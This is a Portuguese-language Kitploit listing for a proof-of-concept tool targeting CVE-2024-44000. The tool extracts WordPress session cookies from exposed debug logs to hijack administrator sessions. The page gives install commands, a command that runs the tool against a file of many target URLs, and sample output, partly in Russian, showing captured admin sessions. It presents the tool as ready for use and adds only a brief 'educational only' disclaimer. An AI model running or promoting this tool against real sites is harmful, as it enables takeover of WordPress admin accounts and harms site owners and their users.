Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-44000 — é uma ferramenta PoC projetada para explorar logs de depuração expostos de forma insegura em sites WordPress e extrair cookies de sessão | Kitploit
Ferramentas/GitHubGitHub/geniuszly/cve-2024-44000
ExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubgeniuszly/cve-2024-44000

CVE-2024-44000

é uma ferramenta PoC projetada para explorar logs de depuração expostos de forma insegura em sites WordPress e extrair cookies de sessão

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PT

GenCookieSessionHijack é uma ferramenta PoC projetada para explorar logs de depuração expostos de forma insegura em sites WordPress e extrair cookies de sessão. Isso permite que o atacante sequestre sessões ativas de administrador e obtenha acesso não autorizado ao painel de administração do WordPress.

Funcionalidades

  • Extrair cookies de logs de depuração do WordPress.
  • Identificar e filtrar cookies de sessão (ex.: wordpress_logged_in).
  • Tentar automaticamente o sequestro de sessão para acesso de administrador.
  • Abrir a sessão de administrador sequestrada diretamente no navegador.

Uso

Instalação

root@kitploit:~
git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt

Executando a ferramenta

  1. Prepare um arquivo com uma lista de URLs WordPress alvo, uma por linha (ex.: list.txt).
  • Execute a ferramenta usando o seguinte comando:
  • root@kitploit:~
    python GenCookieSessionHijack.py -f list.txt -o result.txt
    

    Parâmetros

    • -f, --file: Caminho para o arquivo contendo a lista de URLs (padrão: list.txt).
    • -o, --output: Arquivo para salvar os resultados (padrão: result.txt).

    Exemplo

    root@kitploit:~
    python GenCookieSessionHijack.py -f targets.txt -o output.txt
    

    Isso lerá a lista de URLs de targets.txt, tentará extrair e usar cookies de sessão, e salvará os resultados em output.txt.

    Resultados

    Se a tentativa de sequestro de sessão for bem-sucedida, a ferramenta gerará uma URL com o cookie de sessão de administrador sequestrado e a abrirá diretamente no navegador padrão.

    Exemplo de saída:

    root@kitploit:~
    [+] Лог-файл успешно получен с http://example.com
    [+] Найдены session cookies для http://example.com:
        wordpress_logged_in_abcdef123456
    [+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
    [+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
    [+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
    
    [-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
    
    [-] Session cookies не найдены в логах для http://another-example.com
    [-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
    
    

    Aviso Legal

    Esta ferramenta é destinada apenas para fins educacionais e não deve ser usada para atividades ilegais. O autor não se responsabiliza por qualquer uso indevido ou dano causado por esta ferramenta.

    Baixar ferramenta